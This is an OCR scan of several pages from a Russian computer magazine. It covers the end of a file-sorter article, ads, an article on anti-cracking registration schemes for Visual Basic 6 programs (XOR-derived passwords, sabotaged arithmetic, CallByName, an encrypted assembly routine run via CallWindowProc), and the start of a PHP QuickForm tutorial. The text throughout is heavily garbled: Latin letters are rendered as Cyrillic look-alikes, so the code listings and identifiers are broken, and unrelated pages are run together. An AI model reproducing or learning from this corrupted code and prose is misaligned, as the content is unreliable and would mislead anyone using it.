стим, у нас имеется файл с именем со- 
геІ_рІіоіо-раіпІехе. В качестве первого пара- 
метра мы передаем это имя, в качестве вто- 
рого - возможные разделители, например «- 
_ 2». Двойку я поставил сюда для обработки 
различных программ конвертирования, та- 
ких как Мт2сІіт, ехе2зѵѵ! и т.д. И в качестве 
третьего параметра передаем указатель на 
массив типа зігіпд, память под который дол- 
жна быть выделена заранее. На выходе мы 
получим следующее: 

согеі 

ріюіо 

раіпі 

Самое время проделать эту процедуру для 
остальных файлов в данной папке. Для это- 
го нам потребуется два вложенных цикла: 
один будет поочередно считывать части 
имени одного файла, а другой - проверять 
их наличие в оставшихся именах. Следова- 
тельно, для проведения анализа нам 
необходим двумерный массив типа зігіпд. 
Первая размерность указывает на порядко- 
вый номер файла, а вторая - на часть его 
имени. Можешь, конечно, сделать самодо- 
полнение при сортировке, но это потребует 
ряда изменений в главном модуле. Так или 
иначе, если система находит более четырех 
сходных слов в именах файлов, то файл с 
критериями открывается на запись и в ко- 
нец добавляется новый критерий. Реализо- 
вав этот модуль, ты получишь готовый сор- 
тировщик с функцией автодополнения. 



^ ШОПЕН КРИТЕРИИ 
СОРТИРОВКИ 

Что еще нужно для корректной работы сор- 
тировщика? Естественно, правила, по кото- 
рым и будет выполняться размещение фай- 
лов по каталогам. Для проверки программы 
требуется выполнить следующие шаги: 

О Создать в корневой директории 
файл-список N основных категорий (іп- 
сіех.ітз), необходимых для первичной 
сортировки. 

О Создать в корневой директории N 
файлов с именами основных категорий и 
расширением .тзі и записать в них крите- 
рии (расширения), определяющие тип 
файла. Например файл аррз.тзі (програм- 
мы) должен содержать строки ехе, сот и 
другие расширения, определяющие файл 
как программу. 

® В каждом из каталогов основных кате- 
горий повторить шаги 1 -2, только критерии 
должны быть специальными для данного типа 
файлов, например критерии, относящие файл 
к типу программ для работы с графикой. 




Составление команды для перемещения 



После составления системы критериев запу- 
скаешь сортировщик и задаешь ему в каче- 
стве параметра для сортировки примерно 20 
файлов разных типов. Если файлы сортиру- 
ются нормально, все на своих местах, то сор- 
тировка написана корректно. Остается только 
проверить модуль самодополнения. Для это- 
го в имена нескольких схожих по типу файлов 
добавим одно и то же слово. После обработ- 
ки сортировщиком это слово должно по- 
явиться в списке критериев для файлов этого 
типа. Если все работает без ошибок, значит, 
все модули написаны верно и не требуют от- 
ладки. Сортировщик готов. □С 




Программа работает 




Успешные результаты работы 





ТОВАРЫ 



СТИЛЕ 




ЭКСКЛЮЗИВНАЯ КОЛЛЕКЦИЯ 
ОДЕЖДЫ И АКСЕССУАРОВ ОТ ЖУРНАЛОВ 

ХАКЕР И ХУЛИГАН 



* 



* Футболки, 
толстовки, 
куртки, 
бейсболки, 



* Кружки, 
зажигалки, 
брелки, 



* Часы 
и многое 
другое 





Кас| 

ОГГ 




И не встречалось множество статей о том, как написать проверку регистрации в зНагепаге-прогах. В большинстве своем их авторы - люди, 
в защите несведущие, и методики их помогут защитить только от начинающих крэкеров - таких, которые не релизят свои крэки, и об их 
«грандиозных взломах» знают лишь немногие. Настоящую опасность представляют крэкеры, входящие в хак-группы и пубпикующие ре- 
лизы на сайтах, любимых поисковиками типа азіаіаѵізіа. Сегодня мы будем разбирать защиту именно от таких крэкеров. 




ПИКБЕЗ О ЗПЩИТЕ ПРОГ НО Ш8Ш ВП8ІС 



к. 



астоящие же крэкеры чаще 
всего входят в одну из хак- 
групп, которые публикуют ре- 
лизы на крайне любимых пои- 
сковиками типа азРаІаѵізРа, 
сайтах. Поэтому разбирать мы 
будем защиту именно от таких 
крэкеров. 

А языки программирования 

Про защиту программ, написанных на 
ЭеІрРіі и С++, рассказано уже довольно 
много. Большинство авторов сходятся на 
мнении, что лучше всего использовать 
всем известные навесные защиты, послед- 
ние версии которых мощно защищают та- 
блицу импорта и код. Совсем иначе обсто- 
ит дело с программами на ѴізиаІ Вазіс 6.0. 
Навесные защиты пока не научились за- 
щищать ѴВ-код и снимаются не сложнее 
упаковщиков (подробнее можно прочитать 
в одной из моих статей на м.йоРРіх.пеР), 
что сильно огорчает ѴВ-программеров. 
Давай разберемся, с чем же это связано. 
Начнем с таблицы импорта, то есть с той 
самой таблички, что хранит адреса и име- 
на вызываемых программой функций. Она 
в основной своей массе вызывает не стан- 
дартные АРІ-функции, а их аналоги из би- 



блиотеки М8ѴВѴМ60.ОИ. Это, вместе с 
необходимостью подстраиваться под все 
версии ѴВ (а каждая версия ѴВ привязыва- 
ет создаваемое приложение к собственной 
версии рантайм-библиотеки 
МЗѴВѴМХХ.ОЩ где XX - номер версии 
ѴВ), создает большие проблемы для 
навесной защиты. Не будем вникать в 
проблемы защиты импорта, а поговорим 
немного про навесную защиту методом 
спертых байт. Она представляет собой пе- 
ремешивание с мусором части кода про- 
граммы (обычно несколько десятков байт 
от точки входа) и мешает крэкеру восста- 
новить программу после снятия с нее 
навесной защиты. Этот метод также не 
прокатит в программах, написанных на ѴВ, 
потому что на точке входа в программу 
можно замусорить лишь две ассемблер- 
ные инструкции: ризМ <смещение кода 
программы> и саІІ 

<М8ѴВѴМ60.ТбипВТМаіп>, остальное ини- 
циализируется самой функцией 
ТІіипРІТМаіп, и перед ее вызовом все дол- 
жно быть в незашифрованном виде. В ос- 
новном именно это не дает создать нор- 
мальную навесную защиту для программ, 
написанных на ѴВ. Ниже я расскажу про 
наиболее сложные и неломаемые защиты, 




которые ты можешь реализовать сам 
в своих программах. Итак, приступим. 

А МЕТОД гпючной 
ПРИФИЕТИКИ 

Для начала напишем функцию, генерящую 
правильный пароль. В нее будет передавать- 
ся имя пользователя, а она должна, отталки- 
ваясь от него, генерить уникальный пароль, 
действительный только для этого имени. 
Самое простое - использовать криптовку 
ХОРГом. При этом процедуры генерации кода 
по имени и наоборот могут выглядеть так, 
как это изображено ниже. 



Генерация пароля из имени пользователя 



'циклично шифруем каждый символ имени пользователя 
числом п, которое варьируется от 0 до 10 
РиЬІіс Рипсііоп 6еіРаз$(зМате Аз ЗРгіпд) 

Ш п А$ ВуРе 

Рог і = 1 То І.еп($№те) 

зРазз = зРазз & Нех(Азс(МісІ$($№те, і, 1)) Хог п) 
п = п + 1 

ІР п > 10 Тііеп п = О 
№хР 

беРРазз = зРазз 
ЕпЦ РипсРіоп 
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ПИШЕМ ПРОФЕССИОНППЬНУЮ защиту 



Получение имени пользователя из пароля 



РиЬІіс Еипсііоп 6еШате($Ра$$ А$ Зігіпд) 

Ш п А$ ВуЕе 

Рог і = 1 То І.еп($Ра55) 5іер 2 

з№те = з№те & СІіг(ѴаІ("&Н" & ММ$($Рая, і, 2)) Хог п) 

п = п + 1 

ІР п > 10 Тііеп п = 0 
№х1 

беШате = $№те 
Ш Рипсііоп 



Как видишь, функции похожи, и это является 
одним из свойств логической операции ХОР - 
она полностью обратима. Вторая функция в 
данном случае отличается от первой лишь 
преобразованием НЕХ в СНР (без этого не 
обойтись, так как, если мы не будем преоб- 
разовывать пароль в НЕХ в первой функции, в 
нем могут появиться непечатаемые символы, 
что явно не понравится конечному пользова- 
телю :)). Теперь, когда пользователь введет 
пароль и имя, мы сможем легко проверить 
правильность этих данных, сгенерировав па- 
роль функцией СеІРазз по имени и сравнив с 
паролем, что ввел юзер. В случае различия 
кодов мы можем вывести сообщение об 
ошибке. Но и это еще не все. Создадим гло- 
бальные переменные зІгІМате и зІгРазз в раз- 
деле объявлений любого модуля: 

риЬІіс зМІате аз зігіпд 

риЬІіс зІгРазз аз зігіпд 

и занесем в них имя и пароль, введенные 
пользователем. Зачем это нужно? Во всех 
расчетах в программе, в конце вычисления, 
мы будем плюсовать результат вычитания 
первого, введенного пользователем, и второ- 
го, который нам вернет процедура СеІРазз, 
пароля. Что это нам даст? Если пароли рав- 
ны, то плюсоваться будет ноль и результат 
вычисления не изменится, в противном слу- 
чае программа попросту начнет работать не 
так как нужно. Вот небольшой пример ис- 
пользования данного метода, если нам нужно 
посчитать произведение числа 2 на 2: 

$гШе$иІН2*2ИѵаІ("&Н" & 6е^Ра$$(з^гNате))-ѵаI( м &Н ,, & 

зігРазз)) 

В результате, если пароли будут одинаковы, 
то прибавляться будет ноль, а если крэкер 
взломал процедуру проверки, пароли будут 
различны и программа начнет глючить. К че- 
му это приведет? Пользователь скачает крэк, 
поработает с взломанной прогой, заметит в 
ней кучу глюков и, если программа действи- 
тельно ему нужна, переустановит ее и купит. 
Крэкеру же убрать все проверки будет край- 
не тяжело, так что не поленись их ввести 
везде, где прога выполняет арифметические 
вычисления. Если вычислений в твоей проге 
нет, результат сравнения легко можно пихать 
в вызов, например, диалоговых окон. Как? 
Очень просто: 

ЕгтМаіп.ЗІш (ѵаІ("&Н п & 6еіРа$$(зІг№те))-ѵаІ("&Н" & 

зігРазз)) 

Если параметр будет не ноль и ты не напи- 
шешь что-нибудь типа «Оп еггог гезите пехі», 
то прога может просто вызвать недопусти- 
мую операцию после взлома, так как в каче- 
стве параметра для функции загрузки формы 
в случае неверного пароля может переда- 
ваться что угодно. Однако этот способ защи- 



ты с трудом, но можно обойти. Ниже я рас- 
смотрю действительно мощные алгоритмы, 
которые, тем не менее, желательно исполь- 
зовать совместно с рассмотренным методом 
глючной арифметики. 

А ВЫЗОВ ФУНКЦИИ ПО ИМЕНИ 

Допустим, нам нужно, чтобы пункт «Сохра- 
нить» в программе был доступен только по- 
сле регистрации ее юзером. Для этого пи- 
шем отдельно функцию сохранения и имену- 
ем ее, к примеру, «заѵе» (почему выбрано та- 
кое маленькое имя, станет понятно дальше). 
Теперь нам нужно, чтобы из имени пользова- 
теля можно было получить слово «заѵе». Про- 
стейший способ - это использовать уже зна- 
комый нам ХОР. Для этого будем ксорить 
имя пользователя с этим словом побайтно: 



программе функций мало, то крэкер оттрасси- 
рует перебираемые функцией саІІЬупате вари- 




СгаскМе, использующий в качестве проверки пароля метод 
вызова функции по имени. Его сломали лишь потому, что в 
нем функций мало 



изег паше 
ХОК 

заѵезаѵез 

Если имя пользователя больше 4 символов, 
мы просто нарастим второй параметр крип- 
товки (слово «заѵе») до нужного нам размера 
(минимальное имя пользователя - 4 симво- 
ла). Результат ХОРГа - это и есть пароль, ко- 
торый мы дадим пользователю, когда он ку- 
пит нашу программу. Как известно, операция 
ХОР обратима, то есть мы легко можем из 
имени и пароля получить обратно строку «за- 
ѵезаѵез», проксорив имя с паролем. Саму же 
строчку «заѵе» мы легко получим, считав пер- 
вые 4 символа. Надеюсь, ты помнишь, что 
введенные пользователем данные нужно хра- 
нить в глобальных переменных? Так вот, в 
обработчик кнопки «Сохранить» мы напишем 
следующее: 

саІІЬупате (гтМаіп, 6еіЕііпсііоп($Іг№те, зІгРазз), 
ѵЬМеШоб 

саІІЬупате здесь - это весьма позитивная штука, по- 
скольку данный оператор 

саІІЬупате здесь - это весьма позитивная 
штука, поскольку данный оператор присут- 
ствует только в ѴізиаІ Вазіс'е и не имеет ана- 
логов ни в Эеірііі, ни в С++. Служит он для 
вызова функции по ее имени, которое может 
храниться где угодно, включая переменные. 
Первым параметром данной функции служит 
объект, который содержит вызываемую нами 
функцию, вторым - имя функции и третьим - 
тип функции (ѵЬбеі, ѵЬІеі, ѵЬМеШосІ, ѵЬЗеЦ. 
Имя функции мы будем получать из имени 
пользователя и его пароля функцией СеІРип- 
сйоп. Соответственно, если мы проксорим 
верное имя с паролем, то первые четыре 
символа будут именем функции - их и воз- 
вратит СеІРипсІіоп (посмотреть ее код можно 
на врезке 1 ). В противном случае СеІРипсІіоп 
может возвратить что угодно, но не «заѵе», 
при этом программа сглючит. Чтобы этого не 
произошло, напиши код так: 

Оп Еггог 6оТо Іато 

СаІІЬупате ІгтМаіп.ѵЬМеІІкиі, СеЕЕипсЕіопдаате, 
зІгРазз) 

ЕхіЕ 5иЬ 

Іато: тздЬох «Пасс неверный» 

Теперь программа просто выведет сообще- 
ние, в случае если пароль неправильный. И 
пусть крэкер ломает функцию оп еггог, чтобы 
сообщение не выводилось, - все равно без 
пароля программа работать не будет. 
РІебольшое предостережение: если в твоей 



анты и методом подбора найдет нужную функ- 
цию, подставит в процедуру генерации пароля 
и получит код. Поэтому эту защиту есть смысл 
применять только в больших проектах, где 
функций несколько десятков или сотен и все 
перебрать крэкеру будет просто лень. 

А теперь поговорим про действительно хард- 
корный метод защиты программ паролем - 
использование ассемблерной функции. 

А ПОРОПЬ- ФУНКЦИЯ 
НООССЕИБПЕРЕ 

Вот мы и дошли до самого интересного. 

А что если в качестве пароля использовать 
ассемблерную функцию, возвращающую од- 
ну из составляющих имени пользователя, на- 
пример А8СІІ-КОД второго символа имени? 
Неплохо, но что это нам даст? Это нам по- 
зволит сравнить пароль пользователя с ре- 
зультатом работы ассемблерной функции, 
имя же пользователя мы сможем использо- 
вать в качестве ключа для шифровки ассем- 
блерной функции от чужих глаз. Я для этих 
целей использую алгоритм ЫоѵѵЕізІі. У этого 
алгоритма есть одна особенность - в каче- 
стве ключа для шифровки он принимает 
только цифры, поэтому проще шифровать не 
всем именем пользователя, а, например, его 
контрольной суммой. Это, я думаю, ты реа- 
лизуешь сам, здесь же для простоты мы бу- 
дем шифровать АЗСІІ-кодом третьего симво- 
ла имени пользователя. То есть пользователь 
вводит имя и пароль, мы декриптуем пароль 
третьим символом имени и запускаем полу- 
ченную в результате декриптовки ассемблер- 
ную функцию с помощью АРІ -функции 
СаІІѴѴіпсІоѵѵРгос. Функция должна нам возвра- 
тить АЗСІІ-код второго символа имени. Если 
это так - пользователь ввел верный пароль, 
иначе, если в качестве пароля был введен 
просто мусор, произойдет ошибка либо при 
декриптовке, либо при вызове этого мусора 
и прога вызовет недопустимую операцию. От 
этого нас спасет уже известный нам Оп Еггог 
ОоТо Іато :). Хотя передача мусора непо- 
средственно в СаІІѴѴіпсІоѵѵзРгос крайне неже- 
лательна: представь, что будет, если процес- 
сору на исполнение пойдет мусор, - так мож- 
но и винт форматнуть по глупости. Но я тебя 
обрадую - если пользователь введет мусор 
вместо пароля, то ошибка в 99% случаев 
произойдет в функции декриптовки, и до 
процессора дело не дойдет. Сама же функ- 
ция проверки в общем виде представлена в 
листинге 3. 



л Если у тебя жур- 
нал без диска, то 
модуль со всеми 
описанными в 
статье функциями 
сливай с тм.боі- 
Ііх.пеі/хсіосзгс.гаг 



Ч5*> 

л На компакт-дис- 
ке лежит модуль со 
всеми описанными 
в статье функция- 
ми, класс модуль 
ВІоѵѵРізІі и элект- 
ронные версии 
статей по исполь- 
зованию ассемб- 
лерных процедур. 
Также ты там най- 
дешь исходник мо- 
его первого 
СгаскМе, в котором 
используется вто- 
рой метод защиты. 



из 






а Полезные статьи 
по теме ты всегда 
можешь найти на 
сайте 

шл/ѵ.сІоГГіх.пеГ. 

Там же почитай 
про использование 
ассемблерных 
процедур. Еще со- 
ветую тебе шифро- 
вать строки в прог- 
раммах, для этого 
скачай прогу ѴВ 
АпГіСгаск. 

ШИ 

а Помни об осо- 
бенностях третьего 
метода и исполь- 
зуй его с осторож- 
ностью. Также не 
забывай, что, если 
твоя прога жутко 
полезна и стоит 
очень дорого, ее 
все равно рано или 
поздно взломают. 



Листинг 3 



'получим ассемблерный код 

$А5М = ВІоѵѵЕі$УесосІе$ігіпд($ігРа$$, Азс(Мі(]$№Мате, 3, 
1 ))) 

'переведем его в массив байт 

'такой функции нет в бейсике, ее ты найдешь в листинге 

4 

'или можешь написать сам, благо это дело пяти минут 
СаІІ ТоВуГе$($А5М) 

'вызываем ассемблерную функцию 
'для этого передаем АРІ функции СаІІКѴіпбоѵѵзРгос 
'адрес на первый байт ассемблерного кода 
ЗА5СІІ = СаШіпбоѵѵРгос(ѴагРГг(ЬуГе$(0))) 

'сравниваем 

ІГ зАЗСІІ = Азс(МісІ$($іг№те, 2,1))Тііеп 
МздВох "Пароль верный" 

ЕІзе 

МздВох "Пароль неверный" 

Епб ІГ 



Листинг 4 



РгіѵаГе ЗиЬ ТоВуГе$($ГгВіп Аз ЗГгіпд) 
Рог і = 0 То І.еп(зРгВіп) - 1 
ВуРез(і) = Азс(Міб$(зРгВіп, і + 1, 1)) 
№хГ 
Епб ЗиЬ 



Повторюсь: функция представлена в общем 
виде. Для ее работоспособности нам потребу- 
ется объявить АРІ -функцию СаІІѴѴіпсІоѵѵзРгос: 

РиЬІіс Ресіаге ЕипсГіоп СаШіпбоѵѵРгос ЫЬ "изег32" АІіаз 
"СаШіпбоѵѵРгосА" (ВуѴаІ ІрРгеѵѴѴпсІЕипс Аз Іщ, ВуѴаІ 
Шпб Аз Щ, ВуѴаІ Мзд Аз Ьопд, ВуѴаІ ѵѵРагат Аз Іощ, 
ВуѴаІ ІРагат Аз Ьопд) Аз Ьопд 
и глобальный массив буЕез: 

РиЬІіс ЬуЕезО аз ЬуЕе 

в разделе объявлений программы, а также - подключить 
класс модуль ЫоѵѵЕізЬ и объявить его так: 

Ш ВІоѵѵЕізЬ Аз №ѵѵ сізВіоѵѵЕізЬ 

Собственно сама ассемблерная функция должна иметь 

вид: 

[ЬіЕз 32] 
шоѵ еах, 12 

12 - возвращаемый символ, он передается в 
регистр еах и создается генератором ключей 
для твоей проги в зависимости от второго А5- 
СІІ-символа имени пользователя. С генерато- 
ром ключей придется потрудиться: ты должен 
написать функцию, которая будет изменять 
этот символ, перекомпилировать ассемблер- 
ную программу и шифровать ее. Я, правда, 
сделал проще, чего и тебе советую: просто от- 
компилируй один вариант ассемблерной функ- 
ции, дизассемблируй его и погляди, где 12 за- 
носится в еах. Пусть твой кейген меняет этот 
байт, а не перекомпилирует все заново. Те- 
перь осталось разобраться, как же откомпили- 
ровать эту функцию в машинный код. Для это- 
го лучше использовать компилятор ассемблера 
пазт, так как он умеет создвать не ЕХЕ, а ВІІМ- 
файлы. Этот ВІІМ-файл мы и будем криптовать 
ВІоѵѵЕізЬ 'ем и при вводе этой криптованной 
строки юзером декриптовать и заносить в мас- 
сив байт. Чтобы пользователю удобнее было 
вводить пароль, шифруй функцию с установ- 
кой параметра НЕХ в Гше, тогда ВІоѵѵЕізЬ будет 
возвращать шестнадцатеричные коды байт. 

При этом пароль увеличится в два раза, но бу- 
дет состоять только из цифр и букв от А до Р. 



Подробнее о вставке ассемблерных процедур 
в код на ѴВ можно прочитать в двух моих 
статьях на эту тему на сайте ѵѵшМіхМ 
В этом методе также рекомендую использовать 
глючную арифметику. Крэкер вряд ли сможет 
написать генератор ассемблерных процедур, не 
зная, что твоя программа способна на такие 
приколы. 

Л вывод 

Если, прочитав про последний метод защи- 
ты, ты ничего не понял, но имеешь желание 
разобраться, придется ознакомиться с рабо- 
той ассемблерных процедур, запускаемых 
из-под ѴВ, и почитать документацию к ас- 
семблеру пазт (лежит также на моем сайте). 
Только тогда все встанет на свои места. 
Описанные методы - практически максимум, 
что можно выжать из ѴВ в плане защиты. 

Все необходимое: класс- модуль ЫоѵѵГізЬ, до- 



кументацию по пазт'у и электронные вари- 
анты моих статей по вставке ассемблерных 
процедур в код на ѴізиаІ Вазіс - естественно, 
можно найти и на диске. ЗС 




Окно регистрации моей программы РоГЕіх ЕакеЗідпег. 

При защите своих программ я использую многие методы 
сразу - это увеличивает стойкость защиты. 
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Мой второй СгаскМе, использующий в качестве последних двух паролей ассемблерный код. На момент написания статьи его 
еще никто не сломал, хотя лежит в сети он уже где- то полгода 
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РиЬІіс ЕипсГіоп (ЗеГРипсГіоп(хЗГгіпдТоСгурГ, хЗГгіпдКеу) 

'если имя функции меньше имени пользователя - нарастим 

ІГ І_еп(хЗГгіпдКеу) < І_еп(хЗГгіпдТоСгурГ) ТЬеп 
Рог і = 1 То І_еп(хЗГгіпдТоСгурГ) 
хЗГгіпдКеу = хЗГгіпдКеу & хЗГгіпдКеу 
ІГ І_еп(хЗГгіпдКеу) > І_еп(хЗігіпдТоСгурГ) ТЬеп Ехіі Рог 
ІЧехГ 

хЗГгіпдКеу = МісІ$(хЗТгіпдКеу, 1, І_еп(хЗГгіпдТоСгурГ)) 

'иначе урезаем имя функции :) - это недопустимо - сделай про- 
верку этого сам 

ЕІзе 

хЗГгіпдКеу = МісІ$(хЗГгіпдКеу, 1, І_еп(хЗГгіпдТоСгурГ)) 

ЕпсІ ІГ 

'шифруем 

Рог і = 1 То І_еп(хЗГгіпдТоСгурГ) 

зСгурГ = Азс(МісІ$(хЗГгіпдКеу, і, 1)) Хог Азс(МісІ$(хЗігіпдТоСгурІ, і, 1)) 
зСгурГесІЗГгіпд = зСгурГесІЗГгіпд & СЬг(зСгурГ) 

ІЧехГ 

зРереаГеЗГгіпд = ІпЗГг(2, зСгурГесІЗГгіпд, І_еГГ$(зСгурГесІЗГппд, 4)) 

ІГ зРереаГеЗГгіпд > О ТЬеп зСгурГесІЗГгіпд = І_еГГ$(зСгурГесІЗГгіпд, зРереаГеЗГгіпд - 1) 
ѲеГРипсГіоп = зСгурГесІЗГгіпд 
ЕпсІ РипсГіоп 
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Тестирование новейших моделей КПК, 
ноутбуков и сотовых телефонов 

Мобильный ОфИС 

Повесть о найденном времени 

КПК для новичков 

Урок 1: Настраиваем КПК на базе ѴѴіпсІоѵѵз МоЬіІе 

Тотальный контроль 

Собираем внешний ИК-порт своими руками 



Мобильные 



(дате)ІапИ 



со освоенный «р? 
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И юбой шеЬ-програннист, что бы он ни писал, рано или поздно сталкивается с проблемой получения данных от пользоватепей. На пер- 
вый взгляд может показаться, что никакой проблемы здесь и в помине нет: сделал НТМІ-форму, и все. Однако же это не так. Пред- 
ставь, что ты делаешь сложную систему и тебе надо генерировать кучу форм с переменным количеством полей. Как здесь быть? Не 
выписывать же каждый раз миллион НТИІ-тэгов и регулярных выражений для проверки параметров! Нужен какой-то универсальный и удоб- 
ный инструмент. И он есть! 




БЫСТРОЕ С03ЦПНИЕ НТМ1-Ф0РМ ПРИ ПОИОЩИ РЕПВДШСКЕОПМ 




своих статьях я постоянно напо- 
минаю тебе, что при обработке 
информации, получаемой от 
пользователей, нужно быть пре- 
дельно внимательным. В серьез- 
ности этих слов легко убедиться, 
почитав статьи во «Взломе»: по- 
жалуй, каждая вторая описывает 
путь для вскрытия системы, где пользова- 
тельские данные не обрабатываются дол- 
жным образом. Да, это целая проблема, осо- 
бенно когда количество проверяемых полей 
переваливает за пару сотен, как это бывает в 
серьезных проектах. Думаю, тебе прекрасно 
понятно, что встраивать проверку вводимых 
пользователем данных в сам движок, который 
обрабатывает эту информацию, нецелесооб- 
разно. Мы ведь стараемся создавать модуль- 
ные системы, которые можно будет легко 
расширять, верно? А такое нагромождение 
кода не пойдет на пользу и вряд ли улучшит 
структуру программы. Определенно, всю ра- 
боту с пользователем лучше выделить в от- 
дельный класс, который бы создавал по опре- 
деленному шаблону НТМЬформы, проверял 
введенные данные и передавал их дальше, в 
модуль обработки информации. В общем-то, 
написать такой класс не так уж и сложно. Я 
даже его некоторое время назад создавал, но 



потом познакомился с РЕАВ, и желание тра- 
тить время, выписывая в сотый раз то, что 
уже написали, отпало. 

^ПОПЕЗНОЯ ГР9ШП 

Я уже рассказывал тебе о том, что такое РЕАВ 
в предыдущих статьях. Если же ты упустил 
это из виду, я повторюсь вкратце. РЕАВ - это 
РНР Ехіепзіоп апб Арріісайоп ВерозіТогу, кол- 
лекция приложений и модулей РНР, структу- 
рированная библиотека разнообразных си- 
стем, поставляемых открытыми кодами. Бла- 
годаря этой системе стало довольно удобно 
релизить какие-то собственные разработки и 
распространять свой код среди единомы- 
шленников. Для потребителей здесь есть 
огромный плюс: к поставляемому коду 
предъявляются куча требований, так что мож- 
но быть почти уверенным в том, что внутри 
нет никакого палевного троянца и код делает 
только то, что написано в документации. Кро- 
ме того, число ошибок в релизах РЕАВ-моду- 
лей невелико. Если ты вдруг почувствуешь в 
себе силы и захочешь создавать расширения 
для РЕАВ, тебе будет полезно почитать о 
предъявляемых к коду требованиях, сделать 
это можно здесь: Іійр://реаг.рІір.пеІ/папиаІ/еп/$іап- 
сіагсіз.ріір. Что же касается темы нашей статьи, 
то для работы нам потребуется два расшире- 



ния: НТМІ__Соттоп и НТМЕОиіскРогт. Уста- 
новить их легко: 

$ реаг іп$іаІІ НТМКоттоп 
$ реаг іп$іаІІ НТМШскРогт 

Утилита РЕАВ скачает полезный релиз из 
инета и выведет тебе нечто вроде «ІпзТаІІ ок: 
НТМЕ ОиіскРогт 3.2.4рІ1». Это означает, что 
установка прошла успешно и можно уже на- 
чинать работу. Я не буду особенно тебя гру- 
зить, описывая возможности системы, мы 
все пощупаем на практике. 

А НИ МИНУТЫ БЕЗ практики; 

Сейчас мы с тобой создадим элементарное 
приложение, которое приводится в качестве 
примера в любой документации по 
ОиіскРогт. Создай рМр-скрипт со следующим 
содержимым:: 

<?ріір 

гедиіге_опсе "НТМІ/ОиіскРогпі.рІір"; 

ЗРогт = пеѵѵ НТМЕ_ОиіскРогт('ха_іе$і', 'деі'); 
ЗТогт-^МЕІетепіСІіеасІег', 'Иеагіег', 'Ха-форма'); 
$Рогт->ас1с1ЕІетепі( , іехР , 1 'пате', 'Твое имя:'); 
$Тогт->а(І(]ЕІетепі('ге$еГ г ’сіеаг', 'Очистить'); 
$Рогт->а(1(]ЕІетепі('$иЬтіі', '$иЬтіі', 'Отправить'); 
$Тогт->Ш$р1ау(); 

?> 




ііб 





ПРИДОЙ ФОРМУ! 




Рис. 1. Вывод сценария дЕ_$Ш.рІф, элементарная форма 




Рис. 2. В этой форме заморожено поле пате 



Чтобы не набивать этот скрипт руками, возь- 
ми его на нашем диске, он лежит там под 
именем цізіаіі.ріір. Когда ты выполнишь 
этот сценарий, то увидишь форму, изобра- 
женную на рисунке 1 . Давай теперь построч- 
но разберемся, как это работает. Первая 
строка подключает к сценарию модуль 
ОиіскРогт.рМр, где описано семейство клас- 
сов, главный из которых - НТМІ__С)иіскРогт. 
Он наследует НТМІ__Сотгтюп, который рас- 
положен в другом модуле. Поэтому если 
Соттоп-расширение у тебя не установлено, 
ты получишь сообщение об ошибке. Также 
уместным с моей стороны будет замечание 
о расположении модуля в файловой систе- 
ме. По умолчанию при установке РЕАК соз- 
дает новые файлы в /изг/ІосаІ/І і Ь/рИ р/, и поэ- 
тому если у тебя появляется ошибка, глася- 
щая, что не удается найти файл 
НТМіуОиіскРогт.рІір для включения, нужно 
будет изменить іпсіисіе-раііі на корректный, 
поменяв глобальные настройки интерпрета- 
тора либо выполнив зеЫпсІисІе ра1;М("/и5г/1о- 
саІ/МЬ/рМр/"). 

Но вернемся к нашему простенькому сцена- 
рию. Вторая строка создает переменную 
класса, причем конструктор вызывается с 



двумя параметрами: именем формы и мето- 
дом, используемым для отправки данных 
сценарию. Как несложно догадаться, все по- 
следующие строки программы вызывают ме- 
тоды созданного объекта. Так, метод абсІЕІе- 
тепі добавляет в форму элемент и принима- 
ет три параметра: первый - тип элемента, 
второй - его название, а третий - символиче- 
ская расшифровка, текст, выводимый поль- 
зователю. В зависимости от типа элемента 
этот текст будет располагаться в разных ме- 
стах: если это кнопка, то будет написан на 
ней, а если текстовое поле, будет располо- 
жен рядом. В общем -то, тут несложно во все 
это въехать, если посмотреть на код и рису- 
нок 1 . Самый последний метод, который вы- 
зывается, - это процедура сіізріау, она выво- 
дит клиенту сгенерированную форму. 

^ЗОИОРОЗКО 

Разумеется, ОиіскРогт обладает еще ку- 
чей разнообразных методов. Самое глав- 
ное, что позволяет делать это расшире- 
ние, - производить утверждение формы, 
то есть проверку ее полей по некоторым 
критериям. Это реализуется при помощи 
метода ѵаІісІаІе(), который проверяет соот- 
ветствие содержимого полей некоторым 
правилам. Правила добавляются спе- 
циальным методом асШиІе, который мы 
более подробно обсудим позже, но преж- 
де мне следует упомянуть о другом инте- 
ресном методе ТгееіеО, который замора- 
живает элементы формы. Прежде всего, 
что тут понимается под заморозкой. Если 
элемент заморожен, то он не может быть 
изменен пользователем. Это реализуется 
по-дедовски просто: меняется само пред- 
ставление документа. До тех пор пока эл- 
емент формы не заморожен, он являет со- 
бой текстовое поле, которое можно редак- 
тировать. Однако после того как програм- 
мист вызвал метод Тгееіе для этого эл- 
емента, его содержимое становится обыч- 
ным текстом. Впрочем, лучше один раз 
увидеть: смотри рисунок 2. 

Тут следует понимать, что физически поле 
никуда не пропало, оно просто сменило тип 
на Ысісіеп. Это хорошо видно на рисунке 3, в 
МтІ-коде сгенерированной формы. 

Для чего может потребоваться эта замо- 
розка? Только для одного: для создания 
форм, которые заполняются в несколько 
этапов, на каждом из которых пользова- 
телю доступно ограниченное число по- 
лей. Разумеется, замораживание нельзя 
рассматривать как инструмент, исклю- 
чающий модификацию информации. Ведь 
юзер легко может подправить МтІ-код 




страницы и изменить даже замороженное 
поле. Для проверки вводимой пользова- 
телем информации нужно использовать 
метод ѵаІісІаіе(), о работе которого и пой- 
дет речь ниже. 

^ДОВЕРЯЙ, НО ПРОВЕРЯЙ 

Нужно рассказать о концепции этого мето- 
да, о том, как он работает. Прежде всего, 
надо понимать, что для проверки сценарию 
должны быть переданы несколько параме- 
тров из формы. Если ни одного параметра 
не передано, проверка считается неудачной. 
Также необходимо задать критерии провер- 
ки, правила. Это делается при помощи спе- 
циального метода асШиІе, который имеет 
следующий формат: ас!сІЯиІе( 'название по- 
ля', 'сообщение при неудаче', правила). 
Здесь уместно привести такой вот пример: 



Пример умной формы 



<?ріір 

$е1_іпсІис1е_раІП("/и$г/ІосаІ/ІіЬ/рІір/"); 
гедиіге_опсе "НТМІ/ОиіскРогт.рІір"; 

$Іогт = пет НТМЕ_ОиіскЕогт('ха_іе$і', 'деі'); 
$Еогт->а(](]ЕІепіепі('[іеа(]ег', ’Ілеа^ег', 'Ха-форма'); 
$Рогт->аМЕІетепі('іехі', 'пате', 'Твое имя:'); 
$Рогт->а(1(]ЕІетепі('іехі', 'етаіГ, 'Твое мыло:'); 
$Рогт->а(1(]ЕІетепі('іехі', 'аде', 'Твой возраст:'); 
